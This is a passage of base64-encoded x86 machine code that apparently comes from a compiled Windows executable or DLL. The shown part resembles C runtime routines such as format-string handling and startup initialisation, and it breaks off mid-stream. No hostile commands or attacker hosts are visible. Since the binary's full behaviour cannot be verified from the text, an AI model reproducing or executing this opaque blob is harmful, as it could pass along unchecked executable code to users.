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QQiYXw+///ib3s+///i/DrCseF9Pv//6MAAACLA4PDCImFlPv//4tD/ImFmPv//42FqPv//1D/taD7//8PvsL/tfT7//+JneT7//9Q/7Xs+///jYWU+///VlD/NUBdARDoTfD//1n/0Iud+Pv//4PEHIHjgAAAAHQhg730+///AHUYjYWo+///UFb/NUxdARDoHfD//1n/0FlZZoO96Pv//2d1HIXbdRiNhaj7//9QVv81SF0BEOj37///Wf/QWVmAPi11EYGN+Pv//wABAABGibXw+///VukE/v//x4X0+///CAAAAImNuPv//+skg+hzD4Rn/P//K8cPhIr+//+D6AMPhckBAADHhbj7//8nAAAA9oX4+///gMeF6Pv//xAAAAAPhGr+//9qMFhmiYXI+///i4W4+///g8BRZomFyvv//4m93Pv//+lF/v//94X4+///ABAAAA+FRf7//4PDBPaF+Pv//yB0HPaF+Pv//0CJneT7//90Bg+/Q/zrBA+3Q/yZ6xf2hfj7//9Ai0P8dAOZ6wIz0omd5Pv///aF+Pv//0B0G4XSfxd8BIXAcxH32IPSAPfagY34+///AAEAAPeF+Pv//wCQAACL2ov4dQIz24O99Pv//wB9DMeF9Pv//wEAAADrGoOl+Pv///e4AAIAADmF9Pv//34GiYX0+///i8cLw3UGIYXc+///jbX7/f//i4X0+////430+///hcB/BovHC8N0LYuF6Pv//5lSUFNX6J5NAACDwTCD+TmJnZD7//+L+IvafgYDjbj7//+IDk7rvY2F+/3//yvGRveF+Pv//wACAACJhez7//+JtfD7//90WYXAdAeLzoA5MHRO/43w+///i43w+///xgEwQOs2hdt1C6EkXQEQiYXw+///i4Xw+///x4XY+///AQAAAOsJT2aDOAB0BkBAhf918yuF8Pv//9H4iYXs+///g73E+///AA+FZQEAAIuF+Pv//6hAdCupAAEAAHQEai3rDqgBdARqK+sGqAJ0FGogWGaJhcj7///Hhdz7//8BAAAAi53U+///i7Xs+///K94rndz7///2hfj7//8MdRf/tdD7//+NheD7//9TaiDokfX//4PEDP+13Pv//4u90Pv//42F4Pv//42NyPv//+iY9f//9oX4+///CFl0G/aF+Pv//wR1EldTajCNheD7///oT/X//4PEDIO92Pv//wB1dYX2fnGLvfD7//+Jtej7////jej7//+Nhaj7//9Qi4Wo+////7CsAAAAjYWc+///V1Do3UoAAIPEEImFkPv//4XAfin/tZz7//+LhdD7//+NteD7///ouvT//wO9kPv//4O96Pv//wBZf6brHION4Pv////rE4uN8Pv//1aNheD7///o4/T//1mDveD7//8AfCD2hfj7//8EdBf/tdD7//+NheD7//9TaiDolfT//4PEDIO9vPv//wB0E/+1vPv//+hB1v//g6W8+///AFmLtcD7//8PtwaJhej7//9mhcB0KouNpPv//4ud5Pv//4vQ6Zb1///oIdz//8cAFgAAADPAUFBQUFDpMvX//4C9tPv//wB0CouFsPv//4NgcP2LheD7//+LTfxfXjPNW+hpzf//ycONSQC3ZwAQmWUAEMtlABAoZgAQdWYAEIFmABDIZgAQ2GcAEIv/VYvsgex0BAAAoRxQARAzxYlF/FOLXRRWi3UIM8BX/3UQi30MjY20+///ibXE+///iZ3o+///iYWs+///iYX4+///iYXU+///iYX0+///iYXc+///iYWw+///iYXY+///6P3O//+F9nU16FTb///HABYAAAAzwFBQUFBQ6Nra//+DxBSAvcD7//8AdAqLhbz7//+DYHD9g8j/6c8KAAAz9jv+dRLoGdv//1ZWVlbHABYAAABW68UPtw+JteD7//+Jtez7//+Jtcz7//+Jtaj7//+JjeT7//9mO84PhHQKAABqAloD+jm14Pv//4m9oPv//w+MSAoAAI1B4GaD+Fh3Dw+3wQ+2gKAUARCD4A/rAjPAi7XM+///a8AJD7aEMMAUARBqCMHoBF6Jhcz7//87xg+EM////4P4Bw+H3QkAAP8khZB7ABAzwION9Pv///+JhaT7//+JhbD7//+JhdT7//+Jhdz7//+Jhfj7//+Jhdj7///psAkAAA+3wYPoIHRIg+gDdDQrxnQkK8J0FIPoAw+FhgkAAAm1+Pv//+mHCQAAg434+///BOl7CQAAg434+///AelvCQAAgY34+///gAAAAOlgCQAACZX4+///6VUJAABmg/kqdSuLA4PDBImd6Pv//4mF1Pv//4XAD402CQAAg434+///BPed1Pv//+kkCQAAi4XU+///a8AKD7fJjUQI0ImF1Pv//+kJCQAAg6X0+///AOn9CAAAZoP5KnUliwODwwSJnej7//+JhfT7//+FwA+N3ggAAION9Pv////p0ggAAIuF9Pv//2vACg+3yY1ECNCJhfT7///ptwgAAA+3wYP4SXRRg/hodECD+Gx0GIP4dw+FnAgAAIGN+Pv//wAIAADpjQgAAGaDP2x1EQP6gY34+///ABAAAOl2CAAAg434+///EOlqCAAAg434+///IOleCAAAD7cHZoP4NnUZZoN/AjR1EoPHBIGN+Pv//wCAAADpPAgAAGaD+DN1GWaDfwIydRKDxwSBpfj7////f///6R0IAABmg/hkD4QTCAAAZoP4aQ+ECQgAAGaD+G8PhP8HAABmg/h1D4T1BwAAZoP4eA+E6wcAAGaD+FgPhOEHAACDpcz7//8Ai4XE+///UY214Pv//8eF2Pv//wEAAADoUvD//1npuAcAAA+3wYP4ZA+PMAIAAA+EvQIAAIP4Uw+PGwEAAHR+g+hBdBArwnRZK8J0CCvCD4XsBQAAg8Egx4Wk+///AQAAAImN5Pv//4ON+Pv//0CDvfT7//8AjbX8+///uAACAACJtfD7//+Jhez7//8PjY0CAADHhfT7//8GAAAA6ekCAAD3hfj7//8wCAAAD4XJAAAAg434+///IOm9AAAA94X4+///MAgAAHUHg434+///IIu99Pv//4P//3UFv////3+DwwT2hfj7//8giZ3o+///i1v8iZ3w+///D4QFBQAAhdt1C6EgXQEQiYXw+///g6Xs+///AIu18Pv//4X/D44dBQAAigaEwA+EEwUAAI2NtPv//w+2wFFQ6F7L//9ZWYXAdAFGRv+F7Pv//zm97Pv//3zQ6egEAACD6FgPhPACAAArwg+ElQAAAIPoBw+E9f7//yvCD4XGBAAAD7cDg8MEM/ZG9oX4+///IIm12Pv//4md6Pv//4mFnPv//3RCiIXI+///jYW0+///UIuFtPv//8aFyfv//wD/sKwAAACNhcj7//9QjYX8+///UOicRAAAg8QQhcB9D4m1sPv//+sHZomF/Pv//42F/Pv//4mF8Pv//4m17Pv//+lCBAAAiwODwwSJnej7//+FwHQ6i0gEhcl0M/eF+Pv//wAIAAAPvwCJjfD7//90EpkrwseF2Pv//wEAAADp/QMAAIOl2Pv//wDp8wMAAKEgXQEQiYXw+///UOjoJQAAWencAwAAg/hwD4/2AQAAD4TeAQAAg/hlD4zKAwAAg/hnD47o/f//g/hpdG2D+G50JIP4bw+FrgMAAPaF+Pv//4CJteT7//90YYGN+Pv//wACAADrVYszg8MEiZ3o+///6JpDAACFwA+EVvr///aF+Pv//yB0DGaLheD7//9miQbrCIuF4Pv//4kGx4Ww+///AQAAAOnBBAAAg434+///QMeF5Pv//woAAAD3hfj7//8AgAAAD4SrAQAAA96LQ/iLU/zp5wEAAHUSZoP5Z3Vjx4X0+///AQAAAOtXOYX0+///fgaJhfT7//+BvfT7//+jAAAAfj2LvfT7//+Bx10BAABX6PEEAABZi43k+///iYWo+///hcB0EImF8Pv//4m97Pv//4vw6wrHhfT7//+jAAAAiwODwwiJhZT7//+LQ/yJhZj7//+NhbT7//9Q/7Wk+///D77B/7X0+///iZ3o+///UP+17Pv//42FlPv//1ZQ/zVAXQEQ6Kbk//9Z/9CLnfj7//+DxByB44AAAAB0IYO99Pv//wB1GI2FtPv//1BW/zVMXQEQ6Hbk//9Z/9BZWWaDveT7//9ndRyF23UYjYW0+///UFb/NUhdARDoUOT//1n/0FlZgD4tdRGBjfj7//8AAQAARom18Pv//1bpCP7//4m19Pv//8eFrPv//wcAAADrJIPocw+Eavz//yvCD4SK/v//g+gDD4XJAQAAx4Ws+///JwAAAPaF+Pv//4DHheT7//8QAAAAD4Rq/v//ajBYZomF0Pv//4uFrPv//4PAUWaJhdL7//+Jldz7///pRf7///eF+Pv//wAQAAAPhUX+//+DwwT2hfj7//8gdBz2hfj7//9AiZ3o+///dAYPv0P86wQPt0P8mesX9oX4+///QItD/HQDmesCM9KJnej7///2hfj7//9AdBuF0n8XfASFwHMR99iD0gD32oGN+Pv//wABAAD3hfj7//8AkAAAi9qL+HUCM9uDvfT7//8AfQzHhfT7//8BAAAA6xqDpfj7///3uAACAAA5hfT7//9+BomF9Pv//4vHC8N1BiGF3Pv//421+/3//4uF9Pv///+N9Pv//4XAfwaLxwvDdC2LheT7//+ZUlBTV+j3QQAAg8Ewg/k5iZ2Q+///i/iL2n4GA42s+///iA5O672Nhfv9//8rxkb3hfj7//8AAgAAiYXs+///ibXw+///dFmFwHQHi86AOTB0Tv+N8Pv//4uN8Pv//8YBMEDrNoXbdQuhJF0BEImF8Pv//4uF8Pv//8eF2Pv//wEAAADrCU9mgzgAdAYDwoX/dfMrhfD7///R+ImF7Pv//4O9sPv//wAPhWUBAACLhfj7//+oQHQrqQABAAB0BGot6w6oAXQEaivrBqgCdBRqIFhmiYXQ+///x4Xc+///AQAAAIud1Pv//4u17Pv//yveK53c+///9oX4+///DHUX/7XE+///jYXg+///U2og6Orp//+DxAz/tdz7//+LvcT7//+NheD7//+NjdD7///o8en///aF+Pv//whZdBv2hfj7//8EdRJXU2owjYXg+///6Kjp//+DxAyDvdj7//8AdXWF9n5xi73w+///ibXk+////43k+///jYW0+///UIuFtPv///+wrAAAAI2FnPv//1dQ6DY/AACDxBCJhZD7//+FwH4p/7Wc+///i4XE+///jbXg+///6BPp//8DvZD7//+DveT7//8AWX+m6xyDjeD7////6xOLjfD7//9WjYXg+///6Dzp//9Zg73g+///AHwg9oX4+///BHQX/7XE+///jYXg+///U2og6O7o//+DxAyDvaj7//8AdBP/taj7///omsr//4OlqPv//wBZi72g+///i53o+///D7cHM/aJheT7//9mO8Z0B4vI6aH1//85tcz7//90DYO9zPv//wcPhVD1//+AvcD7//8AdAqLhbz7//+DYHD9i4Xg+///i038X14zzVvoyMH//8nDi/9gcwAQWHEAEIpxABDlcQAQMXIAED1yABCDcgAQgnMAEIv/VYvsVlcz9v91COi5IAAAi/hZhf91JzkFaGMBEHYfVv8VsAABEI2G6AMAADsFaGMBEHYDg8j/i/CD+P91yovHX15dw4v/VYvsVlcz9moA/3UM/3UI6Io/AACL+IPEDIX/dSc5BWhjARB2H1b/FbAAARCNhugDAAA7BWhjARB2A4PI/4vwg/j/dcOLx19eXcOL/1WL7FZXM/b/dQz/dQjoXkAAAIv4WVmF/3UsOUUMdCc5BWhjARB2H1b/FbAAARCNhugDAAA7BWhjARB2A4PI/4vwg/j/dcGLx19eXcOL/1WL7Fe/6AMAAFf/FbAAARD/dQj/FZQAARCBx+gDAACB/2DqAAB3BIXAdN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